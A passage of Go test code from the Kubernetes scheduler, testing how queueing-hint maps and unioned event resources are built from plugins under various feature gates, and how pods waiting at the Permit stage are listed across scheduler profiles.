				t.Fatalf("Failed to create scheduler: %v", err)
			}
		})
	}
}
// indexByPodSpecNodeName is a cache.IndexFunc that indexes pods by the node
// name recorded in their spec. Non-pod objects and unscheduled pods produce
// no index entries.
func indexByPodSpecNodeName(obj interface{}) ([]string, error) {
	pod, isPod := obj.(*v1.Pod)
	if !isPod || pod.Spec.NodeName == "" {
		return []string{}, nil
	}
	return []string{pod.Spec.NodeName}, nil
}
// indexByPodAnnotationNodeName is a cache.IndexFunc that indexes pods by
// their "node-name" annotation. Objects that are not pods, or pods without
// that annotation, produce no index entries.
func indexByPodAnnotationNodeName(obj interface{}) ([]string, error) {
	pod, isPod := obj.(*v1.Pod)
	if !isPod {
		return []string{}, nil
	}
	// A lookup on a nil/empty annotation map simply reports "not found".
	if nodeName, found := pod.Annotations["node-name"]; found {
		return []string{nodeName}, nil
	}
	return []string{}, nil
}
// Names of the fake plugins used by the queueing-hint and event-registration
// tests below (Test_buildQueueingHintMap, Test_UnionedGVKs, ...).
const (
	filterWithoutEnqueueExtensions = "filterWithoutEnqueueExtensions"
	fakeNode                       = "fakeNode"
	fakePod                        = "fakePod"
	emptyEventsToRegister          = "emptyEventsToRegister"
	errorEventsToRegister          = "errorEventsToRegister"
	queueSort                      = "no-op-queue-sort-plugin"
	fakeBind                       = "bind-plugin"
	emptyEventExtensions           = "emptyEventExtensions"
	fakePermit                     = "fakePermit"
)
// Test_buildQueueingHintMap verifies which (cluster event -> queueing-hint
// function) pairs buildQueueingHintMap derives from the plugins' enqueue
// extensions, with the SchedulerQueueingHints feature gate both enabled and
// disabled (disabled replaces plugin hints with defaultQueueingHintFn).
//
// NOTE(review): the verification loop below only checks events present in
// `got` against `want`; a want-entry with no matching got-event is never
// reported missing. In particular the fakePod entry in the "register plugins
// including emptyEventPlugin" case has no fakePodPlugin in its plugin list,
// so it appears to be dead expectation — confirm before relying on it.
func Test_buildQueueingHintMap(t *testing.T) {
	tests := []struct {
		name                string
		plugins             []fwk.Plugin
		want                map[fwk.ClusterEvent][]*internalqueue.QueueingHintFunction
		featuregateDisabled bool
		wantErr             error
	}{
		{
			// A plugin without EnqueueExtensions gets the default hint for
			// every resource with ActionType All.
			name:    "filter without EnqueueExtensions plugin",
			plugins: []fwk.Plugin{&filterWithoutEnqueueExtensionsPlugin{}},
			want: map[fwk.ClusterEvent][]*internalqueue.QueueingHintFunction{
				{Resource: fwk.Pod, ActionType: fwk.All}: {
					{PluginName: filterWithoutEnqueueExtensions, QueueingHintFn: defaultQueueingHintFn},
				},
				{Resource: fwk.Node, ActionType: fwk.All}: {
					{PluginName: filterWithoutEnqueueExtensions, QueueingHintFn: defaultQueueingHintFn},
				},
				{Resource: fwk.CSINode, ActionType: fwk.All}: {
					{PluginName: filterWithoutEnqueueExtensions, QueueingHintFn: defaultQueueingHintFn},
				},
				{Resource: fwk.CSIDriver, ActionType: fwk.All}: {
					{PluginName: filterWithoutEnqueueExtensions, QueueingHintFn: defaultQueueingHintFn},
				},
				{Resource: fwk.CSIStorageCapacity, ActionType: fwk.All}: {
					{PluginName: filterWithoutEnqueueExtensions, QueueingHintFn: defaultQueueingHintFn},
				},
				{Resource: fwk.PersistentVolume, ActionType: fwk.All}: {
					{PluginName: filterWithoutEnqueueExtensions, QueueingHintFn: defaultQueueingHintFn},
				},
				{Resource: fwk.StorageClass, ActionType: fwk.All}: {
					{PluginName: filterWithoutEnqueueExtensions, QueueingHintFn: defaultQueueingHintFn},
				},
				{Resource: fwk.PersistentVolumeClaim, ActionType: fwk.All}: {
					{PluginName: filterWithoutEnqueueExtensions, QueueingHintFn: defaultQueueingHintFn},
				},
				{Resource: fwk.ResourceClaim, ActionType: fwk.All}: {
					{PluginName: filterWithoutEnqueueExtensions, QueueingHintFn: defaultQueueingHintFn},
				},
				{Resource: fwk.DeviceClass, ActionType: fwk.All}: {
					{PluginName: filterWithoutEnqueueExtensions, QueueingHintFn: defaultQueueingHintFn},
				},
				{Resource: fwk.Workload, ActionType: fwk.All}: {
					{PluginName: filterWithoutEnqueueExtensions, QueueingHintFn: defaultQueueingHintFn},
				},
			},
		},
		{
			name:    "node and pod plugin",
			plugins: []fwk.Plugin{&fakeNodePlugin{}, &fakePodPlugin{}},
			want: map[fwk.ClusterEvent][]*internalqueue.QueueingHintFunction{
				{Resource: fwk.Pod, ActionType: fwk.Add}: {
					{PluginName: fakePod, QueueingHintFn: fakePodPluginQueueingFn},
				},
				{Resource: fwk.Node, ActionType: fwk.Add}: {
					{PluginName: fakeNode, QueueingHintFn: fakeNodePluginQueueingFn},
				},
				{Resource: fwk.Node, ActionType: fwk.UpdateNodeTaint}: {
					{PluginName: fakeNode, QueueingHintFn: defaultQueueingHintFn}, // When Node/Add is registered, Node/UpdateNodeTaint is automatically registered.
				},
			},
		},
		{
			name:                "node and pod plugin (featuregate is disabled)",
			plugins:             []fwk.Plugin{&fakeNodePlugin{}, &fakePodPlugin{}},
			featuregateDisabled: true,
			want: map[fwk.ClusterEvent][]*internalqueue.QueueingHintFunction{
				{Resource: fwk.Pod, ActionType: fwk.Add}: {
					{PluginName: fakePod, QueueingHintFn: defaultQueueingHintFn}, // default queueing hint due to disabled feature gate.
				},
				{Resource: fwk.Node, ActionType: fwk.Add}: {
					{PluginName: fakeNode, QueueingHintFn: defaultQueueingHintFn}, // default queueing hint due to disabled feature gate.
				},
				{Resource: fwk.Node, ActionType: fwk.UpdateNodeTaint}: {
					{PluginName: fakeNode, QueueingHintFn: defaultQueueingHintFn}, // When Node/Add is registered, Node/UpdateNodeTaint is automatically registered.
				},
			},
		},
		{
			name:    "register plugin with empty event",
			plugins: []fwk.Plugin{&emptyEventPlugin{}},
			want:    map[fwk.ClusterEvent][]*internalqueue.QueueingHintFunction{},
		},
		{
			name:    "register plugins including emptyEventPlugin",
			plugins: []fwk.Plugin{&emptyEventPlugin{}, &fakeNodePlugin{}},
			want: map[fwk.ClusterEvent][]*internalqueue.QueueingHintFunction{
				// NOTE(review): fakePodPlugin is not in this case's plugin
				// list, so this Pod/Add entry can never appear in `got`; the
				// loop below would not notice it missing — confirm intent.
				{Resource: fwk.Pod, ActionType: fwk.Add}: {
					{PluginName: fakePod, QueueingHintFn: fakePodPluginQueueingFn},
				},
				{Resource: fwk.Node, ActionType: fwk.Add}: {
					{PluginName: fakeNode, QueueingHintFn: fakeNodePluginQueueingFn},
				},
				{Resource: fwk.Node, ActionType: fwk.UpdateNodeTaint}: {
					{PluginName: fakeNode, QueueingHintFn: defaultQueueingHintFn}, // When Node/Add is registered, Node/UpdateNodeTaint is automatically registered.
				},
			},
		},
		{
			name:    "one EventsToRegister returns an error",
			plugins: []fwk.Plugin{&errorEventsToRegisterPlugin{}},
			want:    map[fwk.ClusterEvent][]*internalqueue.QueueingHintFunction{},
			wantErr: errors.New("mock error"),
		},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			if tt.featuregateDisabled {
				featuregatetesting.SetFeatureGateEmulationVersionDuringTest(t, feature.DefaultFeatureGate, version.MustParse("1.33"))
				featuregatetesting.SetFeatureGateDuringTest(t, feature.DefaultFeatureGate, features.SchedulerQueueingHints, false)
			}
			logger, ctx := ktesting.NewTestContext(t)
			ctx, cancel := context.WithCancel(ctx)
			defer cancel()
			registry := frameworkruntime.Registry{}
			cfgPls := &schedulerapi.Plugins{}
			// Always add a bind and a queue-sort plugin; a framework cannot be
			// built without them.
			plugins := append(tt.plugins, &fakebindPlugin{}, &fakeQueueSortPlugin{})
			for _, pl := range plugins {
				tmpPl := pl
				if err := registry.Register(pl.Name(), func(_ context.Context, _ runtime.Object, _ fwk.Handle) (fwk.Plugin, error) {
					return tmpPl, nil
				}); err != nil {
					t.Fatalf("fail to register filter plugin (%s)", pl.Name())
				}
				cfgPls.MultiPoint.Enabled = append(cfgPls.MultiPoint.Enabled, schedulerapi.Plugin{Name: pl.Name()})
			}
			profile := schedulerapi.KubeSchedulerProfile{Plugins: cfgPls}
			fwk, err := newFramework(ctx, registry, profile)
			if err != nil {
				t.Fatal(err)
			}
			exts := fwk.EnqueueExtensions()
			// need to sort to make the test result stable.
			sort.Slice(exts, func(i, j int) bool {
				return exts[i].Name() < exts[j].Name()
			})
			got, err := buildQueueingHintMap(ctx, exts)
			if err != nil {
				if tt.wantErr != nil && tt.wantErr.Error() != err.Error() {
					t.Fatalf("unexpected error from buildQueueingHintMap: expected: %v, actual: %v", tt.wantErr, err)
				}
				if tt.wantErr == nil {
					t.Fatalf("unexpected error from buildQueueingHintMap: %v", err)
				}
			}
			// Hint functions cannot be compared by identity, so compare each
			// got-entry by plugin name and by the value/error the function
			// produces for a nil input.
			for e, fns := range got {
				wantfns, ok := tt.want[e]
				if !ok {
					t.Errorf("got unexpected event %v", e)
					continue
				}
				if len(fns) != len(wantfns) {
					t.Errorf("got %v queueing hint functions, want %v", len(fns), len(wantfns))
					continue
				}
				for i, fn := range fns {
					if fn.PluginName != wantfns[i].PluginName {
						t.Errorf("got plugin name %v, want %v", fn.PluginName, wantfns[i].PluginName)
						continue
					}
					got, gotErr := fn.QueueingHintFn(logger, nil, nil, nil)
					want, wantErr := wantfns[i].QueueingHintFn(logger, nil, nil, nil)
					if got != want || gotErr != wantErr {
						t.Errorf("got queueing hint function (%v) returning (%v, %v), expect it to return (%v, %v)", fn.PluginName, got, gotErr, want, wantErr)
						continue
					}
				}
			}
		})
	}
}
// Test_UnionedGVKs tests UnionedGVKs worked with buildQueueingHintMap.
func Test_UnionedGVKs(t *testing.T) {
tests := []struct {
name string
plugins schedulerapi.PluginSet
want map[fwk.EventResource]fwk.ActionType
enableInPlacePodVerticalScaling bool
enableSchedulerQueueingHints bool
enableDynamicResourceAllocation bool
enableNodeDeclaredFeatures bool
enableGangScheduling bool
}{
{
name: "filter without EnqueueExtensions plugin",
plugins: schedulerapi.PluginSet{
Enabled: []schedulerapi.Plugin{
{Name: filterWithoutEnqueueExtensions},
{Name: queueSort},
{Name: fakeBind},
},
Disabled: []schedulerapi.Plugin{{Name: "*"}}, // disable default plugins
},
want: map[fwk.EventResource]fwk.ActionType{
fwk.Pod: fwk.All,
fwk.Node: fwk.All,
fwk.CSINode: fwk.All,
fwk.CSIDriver: fwk.All,
fwk.CSIStorageCapacity: fwk.All,
fwk.PersistentVolume: fwk.All,
fwk.PersistentVolumeClaim: fwk.All,
fwk.StorageClass: fwk.All,
fwk.ResourceClaim: fwk.All,
fwk.DeviceClass: fwk.All,
},
},
{
name: "filter without EnqueueExtensions plugin (GenericWorkload enabled)",
plugins: schedulerapi.PluginSet{
Enabled: []schedulerapi.Plugin{
{Name: filterWithoutEnqueueExtensions},
{Name: queueSort},
{Name: fakeBind},
},
Disabled: []schedulerapi.Plugin{{Name: "*"}}, // disable default plugins
},
want: map[fwk.EventResource]fwk.ActionType{
fwk.Pod: fwk.All,
fwk.Node: fwk.All,
fwk.CSINode: fwk.All,
fwk.CSIDriver: fwk.All,
fwk.CSIStorageCapacity: fwk.All,
fwk.PersistentVolume: fwk.All,
fwk.PersistentVolumeClaim: fwk.All,
fwk.StorageClass: fwk.All,
fwk.ResourceClaim: fwk.All,
fwk.DeviceClass: fwk.All,
fwk.Workload: fwk.All,
},
enableGangScheduling: true,
enableInPlacePodVerticalScaling: true,
enableDynamicResourceAllocation: true,
enableSchedulerQueueingHints: true,
},
{
name: "node plugin",
plugins: schedulerapi.PluginSet{
Enabled: []schedulerapi.Plugin{
{Name: fakeNode},
{Name: queueSort},
{Name: fakeBind},
},
Disabled: []schedulerapi.Plugin{{Name: "*"}}, // disable default plugins
},
want: map[fwk.EventResource]fwk.ActionType{
fwk.Node: fwk.Add | fwk.UpdateNodeTaint, // When Node/Add is registered, Node/UpdateNodeTaint is automatically registered.
},
},
{
name: "pod plugin",
plugins: schedulerapi.PluginSet{
Enabled: []schedulerapi.Plugin{
{Name: fakePod},
{Name: queueSort},
{Name: fakeBind},
},
Disabled: []schedulerapi.Plugin{{Name: "*"}}, // disable default plugins
},
want: map[fwk.EventResource]fwk.ActionType{
fwk.Pod: fwk.Add,
},
},
{
name: "node and pod plugin",
plugins: schedulerapi.PluginSet{
Enabled: []schedulerapi.Plugin{
{Name: fakePod},
{Name: fakeNode},
{Name: queueSort},
{Name: fakeBind},
},
Disabled: []schedulerapi.Plugin{{Name: "*"}}, // disable default plugins
},
want: map[fwk.EventResource]fwk.ActionType{
fwk.Pod: fwk.Add,
fwk.Node: fwk.Add | fwk.UpdateNodeTaint, // When Node/Add is registered, Node/UpdateNodeTaint is automatically registered.
},
},
{
name: "empty EventsToRegister plugin",
plugins: schedulerapi.PluginSet{
Enabled: []schedulerapi.Plugin{
{Name: emptyEventsToRegister},
{Name: queueSort},
{Name: fakeBind},
},
Disabled: []schedulerapi.Plugin{{Name: "*"}}, // disable default plugins
},
want: map[fwk.EventResource]fwk.ActionType{},
},
{
name: "plugins with default profile (No feature gate enabled)",
plugins: schedulerapi.PluginSet{Enabled: defaults.PluginsV1.MultiPoint.Enabled},
want: map[fwk.EventResource]fwk.ActionType{
fwk.Pod: fwk.Add | fwk.UpdatePodLabel | fwk.Delete,
fwk.Node: fwk.Add | fwk.UpdateNodeAllocatable | fwk.UpdateNodeLabel | fwk.UpdateNodeTaint | fwk.Delete,
fwk.CSINode: fwk.All - fwk.Delete,
fwk.CSIDriver: fwk.Update,
fwk.CSIStorageCapacity: fwk.All - fwk.Delete,
fwk.PersistentVolume: fwk.All - fwk.Delete,
fwk.PersistentVolumeClaim: fwk.All - fwk.Delete,
fwk.StorageClass: fwk.All - fwk.Delete,
fwk.VolumeAttachment: fwk.Delete,
},
},
{
name: "plugins with default profile (InPlacePodVerticalScaling: enabled)",
plugins: schedulerapi.PluginSet{Enabled: defaults.PluginsV1.MultiPoint.Enabled},
want: map[fwk.EventResource]fwk.ActionType{
fwk.Pod: fwk.Add | fwk.UpdatePodLabel | fwk.UpdatePodScaleDown | fwk.Delete,
fwk.Node: fwk.Add | fwk.UpdateNodeAllocatable | fwk.UpdateNodeLabel | fwk.UpdateNodeTaint | fwk.Delete,
fwk.CSINode: fwk.All - fwk.Delete,
fwk.CSIDriver: fwk.Update,
fwk.CSIStorageCapacity: fwk.All - fwk.Delete,
fwk.PersistentVolume: fwk.All - fwk.Delete,
fwk.PersistentVolumeClaim: fwk.All - fwk.Delete,
fwk.StorageClass: fwk.All - fwk.Delete,
fwk.VolumeAttachment: fwk.Delete,
},
enableInPlacePodVerticalScaling: true,
},
{
name: "plugins with default profile (queueingHint/InPlacePodVerticalScaling: enabled)",
plugins: schedulerapi.PluginSet{Enabled: defaults.PluginsV1.MultiPoint.Enabled},
want: map[fwk.EventResource]fwk.ActionType{
fwk.Pod: fwk.Add | fwk.UpdatePodLabel | fwk.UpdatePodScaleDown | fwk.UpdatePodToleration | fwk.UpdatePodSchedulingGatesEliminated | fwk.Delete,
fwk.Node: fwk.Add | fwk.UpdateNodeAllocatable | fwk.UpdateNodeLabel | fwk.UpdateNodeTaint | fwk.Delete,
fwk.CSINode: fwk.All - fwk.Delete,
fwk.CSIDriver: fwk.Update,
fwk.CSIStorageCapacity: fwk.All - fwk.Delete,
fwk.PersistentVolume: fwk.All - fwk.Delete,
fwk.PersistentVolumeClaim: fwk.All - fwk.Delete,
fwk.StorageClass: fwk.All - fwk.Delete,
fwk.VolumeAttachment: fwk.Delete,
},
enableInPlacePodVerticalScaling: true,
enableSchedulerQueueingHints: true,
},
{
name: "plugins with default profile (DynamicResourceAllocation: enabled)",
plugins: schedulerapi.PluginSet{Enabled: defaults.PluginsV1.MultiPoint.Enabled},
want: map[fwk.EventResource]fwk.ActionType{
fwk.Pod: fwk.Add | fwk.UpdatePodLabel | fwk.UpdatePodGeneratedResourceClaim | fwk.Delete,
fwk.Node: fwk.Add | fwk.UpdateNodeAllocatable | fwk.UpdateNodeLabel | fwk.UpdateNodeTaint | fwk.Delete,
fwk.CSINode: fwk.All - fwk.Delete,
fwk.CSIDriver: fwk.Update,
fwk.CSIStorageCapacity: fwk.All - fwk.Delete,
fwk.PersistentVolume: fwk.All - fwk.Delete,
fwk.PersistentVolumeClaim: fwk.All - fwk.Delete,
fwk.StorageClass: fwk.All - fwk.Delete,
fwk.VolumeAttachment: fwk.Delete,
fwk.DeviceClass: fwk.All - fwk.Delete,
fwk.ResourceClaim: fwk.All - fwk.Delete,
fwk.ResourceSlice: fwk.All - fwk.Delete,
},
enableDynamicResourceAllocation: true,
},
{
name: "plugins with default profile (queueingHint/DynamicResourceAllocation: enabled)",
plugins: schedulerapi.PluginSet{Enabled: defaults.PluginsV1.MultiPoint.Enabled},
want: map[fwk.EventResource]fwk.ActionType{
fwk.Pod: fwk.Add | fwk.UpdatePodLabel | fwk.UpdatePodGeneratedResourceClaim | fwk.UpdatePodToleration | fwk.UpdatePodSchedulingGatesEliminated | fwk.Delete,
fwk.Node: fwk.Add | fwk.UpdateNodeAllocatable | fwk.UpdateNodeLabel | fwk.UpdateNodeTaint | fwk.Delete,
fwk.CSINode: fwk.All - fwk.Delete,
fwk.CSIDriver: fwk.Update,
fwk.CSIStorageCapacity: fwk.All - fwk.Delete,
fwk.PersistentVolume: fwk.All - fwk.Delete,
fwk.PersistentVolumeClaim: fwk.All - fwk.Delete,
fwk.StorageClass: fwk.All - fwk.Delete,
fwk.VolumeAttachment: fwk.Delete,
fwk.DeviceClass: fwk.All - fwk.Delete,
fwk.ResourceClaim: fwk.All - fwk.Delete,
fwk.ResourceSlice: fwk.All - fwk.Delete,
},
enableDynamicResourceAllocation: true,
enableSchedulerQueueingHints: true,
},
{
name: "plugins with default profile and NodeDeclaredFeatures",
plugins: schedulerapi.PluginSet{Enabled: append(defaults.PluginsV1.MultiPoint.Enabled, schedulerapi.Plugin{Name: names.NodeDeclaredFeatures})},
want: map[fwk.EventResource]fwk.ActionType{
// NodeDeclaredFeatures adds fwk.Update
fwk.Pod: fwk.Add | fwk.UpdatePodLabel | fwk.UpdatePodGeneratedResourceClaim | fwk.UpdatePodToleration | fwk.UpdatePodSchedulingGatesEliminated | fwk.Delete | fwk.Update,
// NodeDeclaredFeatures adds fwk.UpdateNodeDeclaredFeature
fwk.Node: fwk.Add | fwk.UpdateNodeAllocatable | fwk.UpdateNodeLabel | fwk.UpdateNodeTaint | fwk.Delete | fwk.UpdateNodeDeclaredFeature,
fwk.CSINode: fwk.All - fwk.Delete,
fwk.CSIDriver: fwk.Update,
fwk.CSIStorageCapacity: fwk.All - fwk.Delete,
fwk.PersistentVolume: fwk.All - fwk.Delete,
fwk.PersistentVolumeClaim: fwk.All - fwk.Delete,
fwk.StorageClass: fwk.All - fwk.Delete,
fwk.VolumeAttachment: fwk.Delete,
fwk.DeviceClass: fwk.All - fwk.Delete,
fwk.ResourceClaim: fwk.All - fwk.Delete,
fwk.ResourceSlice: fwk.All - fwk.Delete,
},
enableDynamicResourceAllocation: true,
enableSchedulerQueueingHints: true,
enableNodeDeclaredFeatures: true,
enableInPlacePodVerticalScaling: true,
},
{
name: "plugins with default profile and GangScheduling",
plugins: schedulerapi.PluginSet{Enabled: append(defaults.PluginsV1.MultiPoint.Enabled, schedulerapi.Plugin{Name: names.GangScheduling})},
want: map[fwk.EventResource]fwk.ActionType{
fwk.Pod: fwk.Add | fwk.UpdatePodLabel | fwk.UpdatePodScaleDown | fwk.UpdatePodGeneratedResourceClaim | fwk.UpdatePodToleration | fwk.UpdatePodSchedulingGatesEliminated | fwk.Delete,
fwk.Node: fwk.Add | fwk.UpdateNodeAllocatable | fwk.UpdateNodeLabel | fwk.UpdateNodeTaint | fwk.Delete,
fwk.CSINode: fwk.All - fwk.Delete,
fwk.CSIDriver: fwk.Update,
fwk.CSIStorageCapacity: fwk.All - fwk.Delete,
fwk.PersistentVolume: fwk.All - fwk.Delete,
fwk.PersistentVolumeClaim: fwk.All - fwk.Delete,
fwk.StorageClass: fwk.All - fwk.Delete,
fwk.VolumeAttachment: fwk.Delete,
fwk.DeviceClass: fwk.All - fwk.Delete,
fwk.ResourceClaim: fwk.All - fwk.Delete,
fwk.ResourceSlice: fwk.All - fwk.Delete,
fwk.Workload: fwk.Add,
},
enableGangScheduling: true,
enableInPlacePodVerticalScaling: true,
enableDynamicResourceAllocation: true,
enableSchedulerQueueingHints: true,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
pluginConfig := defaults.PluginConfigsV1
if !tt.enableSchedulerQueueingHints || !tt.enableDynamicResourceAllocation {
// Set emulated version before setting other feature gates, since it can impact feature dependencies.
featuregatetesting.SetFeatureGateEmulationVersionDuringTest(t, feature.DefaultFeatureGate, version.MustParse("1.33"))
} else if !tt.enableInPlacePodVerticalScaling {
// In place pod resize GA'd in 1.35. Set emulation version to 1.34 for tests that do not have the flag set
featuregatetesting.SetFeatureGateEmulationVersionDuringTest(t, feature.DefaultFeatureGate, version.MustParse("1.34"))
} else {
featuregatetesting.SetFeatureGateDuringTest(t, feature.DefaultFeatureGate, features.NodeDeclaredFeatures, tt.enableNodeDeclaredFeatures)
featuregatetesting.SetFeatureGatesDuringTest(t, feature.DefaultFeatureGate, featuregatetesting.FeatureOverrides{
features.NodeDeclaredFeatures: tt.enableNodeDeclaredFeatures,
features.GenericWorkload: tt.enableGangScheduling,
features.GangScheduling: tt.enableGangScheduling,
})
}
featuregatetesting.SetFeatureGatesDuringTest(t, feature.DefaultFeatureGate, featuregatetesting.FeatureOverrides{
features.InPlacePodVerticalScaling: tt.enableInPlacePodVerticalScaling,
features.DynamicResourceAllocation: tt.enableDynamicResourceAllocation,
})
if !tt.enableSchedulerQueueingHints {
featuregatetesting.SetFeatureGateDuringTest(t, feature.DefaultFeatureGate, features.SchedulerQueueingHints, false)
// The test uses defaults.PluginConfigsV1, which contains the filter timeout.
// With emulation of 1.33, the DRASchedulerFilterTimeout feature gets disabled
// and also cannot be enabled ("pre-alpha"), which makes the config invalid.
// To avoid this, we have to patch the config.
pluginConfig = slices.Clone(pluginConfig)
for i := range pluginConfig {
if pluginConfig[i].Name == "DynamicResources" {
pluginConfig[i].Args = &schedulerapi.DynamicResourcesArgs{}
break
}
}
}
_, ctx := ktesting.NewTestContext(t)
ctx, cancel := context.WithCancel(ctx)
defer cancel()
registry := plugins.NewInTreeRegistry()
cfgPls := &schedulerapi.Plugins{MultiPoint: tt.plugins}
plugins := []fwk.Plugin{&fakeNodePlugin{}, &fakePodPlugin{}, &filterWithoutEnqueueExtensionsPlugin{}, &emptyEventsToRegisterPlugin{}, &fakeQueueSortPlugin{}, &fakebindPlugin{}}
for _, pl := range plugins {
tmpPl := pl
if err := registry.Register(pl.Name(), func(_ context.Context, _ runtime.Object, _ fwk.Handle) (fwk.Plugin, error) {
return tmpPl, nil
}); err != nil {
t.Fatalf("fail to register filter plugin (%s)", pl.Name())
}
}
profile := schedulerapi.KubeSchedulerProfile{Plugins: cfgPls, PluginConfig: pluginConfig}
fwk, err := newFramework(ctx, registry, profile)
if err != nil {
t.Fatal(err)
}
queueingHintMap, err := buildQueueingHintMap(ctx, fwk.EnqueueExtensions())
if err != nil {
t.Fatal(err)
}
queueingHintsPerProfile := internalqueue.QueueingHintMapPerProfile{
"default": queueingHintMap,
}
got := unionedGVKs(queueingHintsPerProfile)
if diff := cmp.Diff(tt.want, got); diff != "" {
t.Errorf("Unexpected eventToPlugin map (-want,+got):%s", diff)
}
})
}
}
// newFramework builds a scheduler framework for tests from the given plugin
// registry and profile. It is backed by an empty node snapshot and an informer
// factory over a fake clientset, so no real API server is needed.
// Note: profile is taken by value, so the framework receives a pointer to the
// test's private copy rather than the caller's struct.
func newFramework(ctx context.Context, r frameworkruntime.Registry, profile schedulerapi.KubeSchedulerProfile) (framework.Framework, error) {
	return frameworkruntime.NewFramework(ctx, r, &profile,
		frameworkruntime.WithSnapshotSharedLister(internalcache.NewSnapshot(nil, nil)),
		frameworkruntime.WithInformerFactory(informers.NewSharedInformerFactory(fake.NewClientset(), 0)),
	)
}
// TestFrameworkHandler_IterateOverWaitingPods verifies that pods parked at the
// Permit stage (by the fakePermit plugin) can be enumerated via
// IterateOverWaitingPods through every profile's framework handle.
func TestFrameworkHandler_IterateOverWaitingPods(t *testing.T) {
	const (
		testSchedulerProfile1 = "test-scheduler-profile-1"
		testSchedulerProfile2 = "test-scheduler-profile-2"
		testSchedulerProfile3 = "test-scheduler-profile-3"
	)

	nodes := []runtime.Object{
		st.MakeNode().Name("node1").UID("node1").Obj(),
		st.MakeNode().Name("node2").UID("node2").Obj(),
		st.MakeNode().Name("node3").UID("node3").Obj(),
	}

	cases := []struct {
		name                        string
		profiles                    []schedulerapi.KubeSchedulerProfile
		waitSchedulingPods          []*v1.Pod
		expectPodNamesInWaitingPods []string
	}{
		{
			name: "pods with same profile are waiting on permit stage",
			profiles: []schedulerapi.KubeSchedulerProfile{
				{
					SchedulerName: testSchedulerProfile1,
					Plugins: &schedulerapi.Plugins{
						QueueSort: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "PrioritySort"}}},
						Permit:    schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: fakePermit}}},
						Bind:      schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "DefaultBinder"}}},
					},
				},
			},
			waitSchedulingPods: []*v1.Pod{
				st.MakePod().Name("pod1").UID("pod1").SchedulerName(testSchedulerProfile1).Obj(),
				st.MakePod().Name("pod2").UID("pod2").SchedulerName(testSchedulerProfile1).Obj(),
				st.MakePod().Name("pod3").UID("pod3").SchedulerName(testSchedulerProfile1).Obj(),
			},
			expectPodNamesInWaitingPods: []string{"pod1", "pod2", "pod3"},
		},
		{
			name: "pods with different profiles are waiting on permit stage",
			profiles: []schedulerapi.KubeSchedulerProfile{
				{
					SchedulerName: testSchedulerProfile1,
					Plugins: &schedulerapi.Plugins{
						QueueSort: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "PrioritySort"}}},
						Permit:    schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: fakePermit}}},
						Bind:      schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "DefaultBinder"}}},
					},
				},
				{
					SchedulerName: testSchedulerProfile2,
					Plugins: &schedulerapi.Plugins{
						QueueSort: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "PrioritySort"}}},
						Permit:    schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: fakePermit}}},
						Bind:      schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "DefaultBinder"}}},
					},
				},
				{
					SchedulerName: testSchedulerProfile3,
					Plugins: &schedulerapi.Plugins{
						QueueSort: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "PrioritySort"}}},
						Permit:    schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: fakePermit}}},
						Bind:      schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "DefaultBinder"}}},
					},
				},
			},
			waitSchedulingPods: []*v1.Pod{
				st.MakePod().Name("pod1").UID("pod1").SchedulerName(testSchedulerProfile1).Obj(),
				st.MakePod().Name("pod2").UID("pod2").SchedulerName(testSchedulerProfile1).Obj(),
				st.MakePod().Name("pod3").UID("pod3").SchedulerName(testSchedulerProfile2).Obj(),
				st.MakePod().Name("pod4").UID("pod4").SchedulerName(testSchedulerProfile3).Obj(),
			},
			expectPodNamesInWaitingPods: []string{"pod1", "pod2", "pod3", "pod4"},
		},
	}

	for _, tc := range cases {
		t.Run(tc.name, func(t *testing.T) {
			// Set up scheduler for the 3 nodes.
			objs := append([]runtime.Object{&v1.Namespace{ObjectMeta: metav1.ObjectMeta{Name: ""}}}, nodes...)
			fakeClient := fake.NewClientset(objs...)
			informerFactory := informers.NewSharedInformerFactory(fakeClient, 0)
			eventBroadcaster := events.NewBroadcaster(&events.EventSinkImpl{Interface: fakeClient.EventsV1()})
			defer eventBroadcaster.Shutdown()
			eventRecorder := eventBroadcaster.NewRecorder(scheme.Scheme, fakePermit)

			// Register fakePermit out-of-tree so each profile can enable it by name.
			outOfTreeRegistry := frameworkruntime.Registry{
				fakePermit: newFakePermitPlugin(eventRecorder),
			}

			tCtx := utiltesting.Init(t)
			scheduler, err := New(
				tCtx,
				fakeClient,
				informerFactory,
				nil,
				profile.NewRecorderFactory(eventBroadcaster),
				WithProfiles(tc.profiles...),
				WithFrameworkOutOfTreeRegistry(outOfTreeRegistry),
			)
			if err != nil {
				t.Fatalf("Failed to create scheduler: %v", err)
			}

			// Count one podWaiting event per pod so the test can block until every
			// pod has reached the Permit stage before inspecting the waiting set.
			var wg sync.WaitGroup
			waitSchedulingPodNumber := len(tc.waitSchedulingPods)
			wg.Add(waitSchedulingPodNumber)
			stopFn, err := eventBroadcaster.StartEventWatcher(func(obj runtime.Object) {
				e, ok := obj.(*eventsv1.Event)
				if !ok || (e.Reason != podWaitingReason) {
					return
				}
				wg.Done()
			})
			if err != nil {
				t.Fatal(err)
			}
			defer stopFn()

			// Run scheduler.
			informerFactory.Start(tCtx.Done())
			informerFactory.WaitForCacheSync(tCtx.Done())
			go scheduler.Run(tCtx)

			// Send pods to be scheduled.
			for _, p := range tc.waitSchedulingPods {
				_, err = fakeClient.CoreV1().Pods("").Create(tCtx, p, metav1.CreateOptions{})
				if err != nil {
					t.Fatal(err)
				}
			}

			// Wait all pods in waitSchedulingPods to be scheduled.
			wg.Wait()

			tCtx.Eventually(func(utiltesting.TContext) sets.Set[string] {
				// Ensure that all waitingPods in scheduler can be obtained from any profiles.
				actualPodNamesInWaitingPods := sets.New[string]()
				for _, schedFramework := range scheduler.Profiles {
					schedFramework.IterateOverWaitingPods(func(pod fwk.WaitingPod) {
						actualPodNamesInWaitingPods.Insert(pod.GetPod().Name)
